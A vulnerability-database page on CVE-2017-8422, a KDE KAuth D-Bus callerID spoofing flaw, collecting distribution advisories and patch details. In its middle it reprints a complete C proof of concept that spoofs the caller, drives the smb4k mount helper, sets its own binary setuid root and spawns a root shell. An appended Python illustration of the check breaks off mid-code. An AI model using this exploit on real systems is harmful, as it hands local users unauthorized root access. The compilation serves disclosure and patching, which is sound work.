CVE-2017-8422
CVSS 7.2
Published: 2017-05-17 10:29:00
Revised: 2018-01-04 21:31:53

[Original] KDE kdelibs before 4.14.32 and KAuth before 5.34 allow local users to gain root privileges by spoofing a callerID and leveraging a privileged helper app.

[CNNVD] No CNNVD data available.

[Machine translation] No translation available.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system shutdown]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-264 [Permissions, Privileges, and Access Controls]

- CPE (affected platforms and products)

cpe:/a:kde:kauth:5.33
cpe:/a:kde:kdelibs:4.14.31

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8422
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8422
(official data source) NVD

- Other links and resources

http://www.debian.org/security/2017/dsa-3849
(UNKNOWN)  DEBIAN  DSA-3849
http://www.openwall.com/lists/oss-security/2017/05/10/3
(VENDOR_ADVISORY)  MLIST  [oss-security] 20170510 generic kde LPE
http://www.securityfocus.com/bid/98412
(VENDOR_ADVISORY)  BID  98412
http://www.securitytracker.com/id/1038480
(UNKNOWN)  SECTRACK  1038480
https://access.redhat.com/errata/RHSA-2017:1264
(UNKNOWN)  REDHAT  RHSA-2017:1264
https://bugzilla.redhat.com/show_bug.cgi?id=1449647
(PATCH)  CONFIRM  https://bugzilla.redhat.com/show_bug.cgi?id=1449647
https://cgit.kde.org/kauth.git/commit/?id=df875f725293af53399f5146362eb158b4f9216a
(PATCH)  CONFIRM  https://cgit.kde.org/kauth.git/commit/?id=df875f725293af53399f5146362eb158b4f9216a
https://cgit.kde.org/kdelibs.git/commit/?id=264e97625abe2e0334f97de17f6ffb52582888ab
(PATCH)  CONFIRM  https://cgit.kde.org/kdelibs.git/commit/?id=264e97625abe2e0334f97de17f6ffb52582888ab
https://security.gentoo.org/glsa/201706-29
(UNKNOWN)  GENTOO  GLSA-201706-29
https://www.exploit-db.com/exploits/42053/
(UNKNOWN)  EXPLOIT-DB  42053
https://www.kde.org/info/security/advisory-20170510-1.txt
(VENDOR_ADVISORY)  CONFIRM  https://www.kde.org/info/security/advisory-20170510-1.txt

- Vulnerability information (F142496)

Ubuntu Security Notice USN-3286-1 (PacketStormID:F142496)
2017-05-15 00:00:00
Ubuntu  security.ubuntu.com
advisory,local,root
linux,ubuntu
CVE-2017-8422

Ubuntu Security Notice 3286-1 - Sebastian Krahmer discovered that the KDE-Libs Kauth component incorrectly checked services invoking D-Bus. A local attacker could use this issue to gain root privileges.

===========================================================================
Ubuntu Security Notice USN-3286-1
May 15, 2017

kde4libs vulnerability
===========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 LTS

Summary:

KDE-Libs could be made to run programs as an administrator if it received
specially crafted input.

Software Description:
- kde4libs: KDE 4 core applications and libraries

Details:

Sebastian Krahmer discovered that the KDE-Libs Kauth component incorrectly
checked services invoking D-Bus. A local attacker could use this issue to
gain root privileges.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 14.04 LTS:
  kdelibs5-plugins                4:4.13.3-0ubuntu0.5

After a standard system update you need to reboot your computer to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3286-1
  CVE-2017-8422

Package Information:
  https://launchpad.net/ubuntu/+source/kde4libs/4:4.13.3-0ubuntu0.5

- Vulnerability information (F142554)

Slackware Security Advisory - kdelibs Updates (PacketStormID:F142554)
2017-05-17 00:00:00
Slackware Security Team  slackware.com
advisory
linux,slackware
CVE-2017-8422

Slackware Security Advisory - New kdelibs packages are available for Slackware 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  kdelibs (SSA:2017-136-02)

New kdelibs packages are available for Slackware 13.37, 14.0, 14.1, 14.2,
and -current to fix a security issue.


Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/kdelibs-4.14.32-i586-1_slack14.2.txz:  Upgraded.
  This update fixes a security issue with KAuth that can lead to gaining
  root from an unprivileged account.
  For more information, see:
    http://www.openwall.com/lists/oss-security/2017/05/10/3
    https://www.kde.org/info/security/advisory-20170510-1.txt
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8422
  (* Security fix *)
+--------------------------+


Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/kdelibs-4.5.5-i486-3_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/kdelibs-4.5.5-x86_64-3_slack13.37.txz

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/kdelibs-4.8.5-i486-2_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/kdelibs-4.8.5-x86_64-2_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/kdelibs-4.10.5-i486-3_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/kdelibs-4.10.5-x86_64-3_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/kdelibs-4.14.32-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/kdelibs-4.14.32-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/kde/kdelibs-4.14.32-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/kde/kdelibs-4.14.32-x86_64-1.txz


MD5 signatures:
+-------------+

Slackware 13.37 package:
2074c2dff09a4a74e60f48f08e0e9abc  kdelibs-4.5.5-i486-3_slack13.37.txz

Slackware x86_64 13.37 package:
692beba6610b1f2440650497bc3085cb  kdelibs-4.5.5-x86_64-3_slack13.37.txz

Slackware 14.0 package:
c61bd3215be43dac0544b54342548837  kdelibs-4.8.5-i486-2_slack14.0.txz

Slackware x86_64 14.0 package:
a408af269fbba64dde31a91b91c72650  kdelibs-4.8.5-x86_64-2_slack14.0.txz

Slackware 14.1 package:
5ddb537f570c63c792511a095bbadb86  kdelibs-4.10.5-i486-3_slack14.1.txz

Slackware x86_64 14.1 package:
199c36c994a11bd48748ef3988ee143b  kdelibs-4.10.5-x86_64-3_slack14.1.txz

Slackware 14.2 package:
ef1e87085864e36b70d9aadcdd20fa7a  kdelibs-4.14.32-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
5182a2121695c705376366f4be56861f  kdelibs-4.14.32-x86_64-1_slack14.2.txz

Slackware -current package:
ba5ba522f02e69ee6f44fc686cce081f  kde/kdelibs-4.14.32-i586-1.txz

Slackware x86_64 -current package:
da0befacb4014eafa221fbc694542d97  kde/kdelibs-4.14.32-x86_64-1.txz


Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg kdelibs-4.14.32-i586-1_slack14.2.txz


+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAlkbXZUACgkQakRjwEAQIjN5NACfR/uqzPV10Yyw2ilFMa07E+5i
ANMAn2ukOVo1nr+HZNifGrzpwK2BeLe4
=rmX2
-----END PGP SIGNATURE-----

- Vulnerability information (F142609)

Red Hat Security Advisory 2017-1264-01 (PacketStormID:F142609)
2017-05-22 00:00:00
Red Hat  
advisory,local,root,spoof
linux,redhat
CVE-2017-8422

Red Hat Security Advisory 2017-1264-01 - The K Desktop Environment is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment. Security Fix: A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: kdelibs security update
Advisory ID:       RHSA-2017:1264-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2017:1264
Issue date:        2017-05-22
CVE Names:         CVE-2017-8422 
=====================================================================

1. Summary:

An update for kdelibs is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64le, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

The K Desktop Environment (KDE) is a graphical desktop environment for the
X Window System. The kdelibs packages include core libraries for the K
Desktop Environment.

Security Fix(es):

* A privilege escalation flaw was found in the way kdelibs handled D-Bus
messages. A local user could potentially use this flaw to gain root
privileges by spoofing a callerID and leveraging a privileged helper
application. (CVE-2017-8422)

Red Hat would like to thank Sebastian Krahmer (SUSE) for reporting this
issue.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The desktop must be restarted (log out, then log back in) for this update
to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1449647 - CVE-2017-8422 kauth: service invoking dbus is not properly checked and allows local privilege escalation

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

x86_64:
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

x86_64:
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

aarch64:
kdelibs-4.14.8-6.el7_3.aarch64.rpm
kdelibs-common-4.14.8-6.el7_3.aarch64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.aarch64.rpm
kdelibs-devel-4.14.8-6.el7_3.aarch64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.aarch64.rpm

ppc64le:
kdelibs-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-common-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-devel-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.ppc64le.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

ppc64:
kdelibs-4.14.8-6.el7_3.ppc.rpm
kdelibs-4.14.8-6.el7_3.ppc64.rpm
kdelibs-common-4.14.8-6.el7_3.ppc64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.ppc.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.ppc64.rpm
kdelibs-devel-4.14.8-6.el7_3.ppc.rpm
kdelibs-devel-4.14.8-6.el7_3.ppc64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.ppc.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.ppc64.rpm

s390x:
kdelibs-4.14.8-6.el7_3.s390.rpm
kdelibs-4.14.8-6.el7_3.s390x.rpm
kdelibs-common-4.14.8-6.el7_3.s390x.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.s390.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.s390x.rpm
kdelibs-devel-4.14.8-6.el7_3.s390.rpm
kdelibs-devel-4.14.8-6.el7_3.s390x.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.s390.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.s390x.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-8422
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFZIryyXlSAg2UNWIIRAut+AKCL6Q41BgxjibClfIq2Qwsu4M9CzQCfSd+5
f9o61xNcufb5ePgoksmuU6o=
=4XX+
-----END PGP SIGNATURE-----


--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce

- Vulnerability information (F142638)

KDE 4/5 KAuth Privilege Escalation (PacketStormID:F142638)
2017-05-23 00:00:00
stealth  
exploit
CVE-2017-8422,CVE-2017-8849

KDE versions 4 and 5 suffer from a KAuth privilege escalation vulnerability.

// cc -Wall smb0k.c -pedantic -std=c11
//
// smb4k PoC, also demonstrating broader scope of a generic kde
// authentication bypass vulnerability
//
// (C) 2017 Sebastian Krahmer
//
 
#define _POSIX_C_SOURCE 200112L
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
 
 
void die(const char *s)
{
    perror(s);
    exit(errno);
}
 
 
int main(int argc, char **argv)
{
    char me[1024] = {0};
    char *dbus[] = {
        "/usr/bin/dbus-send",
        "--system",
        "--print-reply",
        "--dest=net.sourceforge.smb4k.mounthelper",
        "/",
        "org.kde.auth.performActions",
        "array:byte:"
// The variant map, containing evil mh_command key-pair
"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,"
"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,"
"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,"
"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,"
"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,"
"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,"
"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,"
"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,"
"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,"
"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,"
"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,"
"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,"
"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,"
"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,"
"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,"
"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,"
"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,"
"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,"
"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,"
"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,"
"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,"
"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,"
"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,"
"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,"
"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,"
"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,"
"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,"
"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,"
"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,"
"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,"
"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,"
"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,"
"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,"
"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,"
"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,"
"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,"
"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,"
"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,"
"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,"
"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,"
"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,"
"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,"
"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,"
"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,"
"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,"
"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,"
"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,"
"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,"
"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,"
"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,"
"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,"
"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,"
"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,"
"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,"
"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,"
"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,"
"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73",
 
// the callerID, ":1.0" which is dbus itself and thus always passes
"array:byte:58,49,46,48", NULL};
 
    char *boomsh = "/tmp/xmount.cifs";
    char *const sh[] = {me, "shell", NULL};
    char *const bash[] = {"/bin/bash", "--norc", "--noprofile", NULL};
    struct stat st;
    int fd = -1;
 
    if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
        die("[-] readlink");
 
    if (geteuid() == 0) {
        setuid(0);
        setgid(0);
        if (argc == 2) {
            execve(*bash, bash, NULL);
            die("[-] execve of bash");
        }
        chown(me, 0, 0);
        chmod(me, 04755);
        exit(0);
    }
 
    printf("[*] Creating shellscript ...\n");
    unlink(boomsh);
    if ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0)
        die("[-] open");
    write(fd, "#!/bin/sh\n", 10);
    write(fd, me, strlen(me));
    write(fd, "\n", 1);
    close(fd);
 
    printf("[*] Triggering call...\n");
 
    if (fork() == 0) {
        execve(*dbus, dbus, NULL);
        exit(1);
    }
    wait(NULL);
    sleep(5);
    printf("[*] Trying to find rootshell...\n");
 
    memset(&st, 0, sizeof(st));
    stat(me, &st);
    if ((st.st_mode & 04000) != 04000)
        die("[-] Failed to chmod ourselfs.\n");
 
    execve(me, sh, NULL);
    return 0;
}


- Vulnerability information (F143154)

Gentoo Linux Security Advisory 201706-29 (PacketStormID:F143154)
2017-06-27 00:00:00
Gentoo  security.gentoo.org
advisory,local,root
linux,gentoo
CVE-2017-8422

Gentoo Linux Security Advisory 201706-29 - A vulnerability in KAuth and KDELibs allows local users to gain root privileges. Versions less than 5.29.0-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201706-29
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: KAuth and KDELibs: Privilege escalation
     Date: June 27, 2017
     Bugs: #618108
       ID: 201706-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in KAuth and KDELibs allows local users to gain root
privileges.

Background
==========

KAuth provides a convenient, system-integrated way to offload actions
that need to be performed as a privileged user (root, for example) to
small (hopefully secure) helper utilities.

The KDE libraries, basis of KDE and used by many open source projects.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  kde-frameworks/kauth       < 5.29.0-r1              >= 5.29.0-r1
  2  kde-frameworks/kdelibs      < 4.14.32                 >= 4.14.32
    -------------------------------------------------------------------
     2 affected packages

Description
===========

KAuth and KDELibs contains a logic flaw in which the service invoking
D-Bus is not properly checked. This allows spoofing the identity of the
caller and with some carefully crafted calls can lead to gaining root
from an unprivileged account.

Impact
======

A local attacker could spoof the identity of the caller invoking D-Bus,
possibly resulting in gaining privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All KAuth users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=kde-frameworks/kauth-5.29.0-r1"


All KDELibs users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=kde-frameworks/kdelibs-4.14.32"


References
==========

[ 1 ] CVE-2017-8422
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-8422

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201706-29

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
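The logic flaw the Gentoo and Red Hat advisories describe, as an added illustration (this is not KDE's code and not the upstream patch; the KAuth and kdelibs commits linked in the resources section carry the real fix): a privileged D-Bus helper authorized requests against a callerID that the client itself placed in the message body, so an unprivileged client could claim another connection's identity. The model below keeps that vulnerable check beside a hardened one that identifies the caller only by the sender name the bus daemon attaches to the message. The connection table, action name, uids and policy mapping are all constructed for the example.

```python
"""Added example: caller identification in a privileged D-Bus helper.

Models the check behind CVE-2017-8422. Everything here (bus table, policy,
action and connection names) is constructed for illustration; it is not
KDE's code.
"""
from dataclasses import dataclass, field
from typing import Optional

# What the bus daemon knows about each live connection: unique name -> uid.
# On a real bus this is what org.freedesktop.DBus.GetConnectionUnixUser answers.
BUS_CONNECTIONS = {
    ":1.0": 0,      # constructed: a root-owned system service
    ":1.57": 1000,  # constructed: an ordinary logged-in user
}

# Constructed policy: uids allowed to run each privileged helper action.
POLICY = {
    "org.example.helper.mount": {0},
}


@dataclass
class Message:
    """A method call as the helper sees it."""
    sender: str                                # unique name stamped by the bus daemon
    action: str
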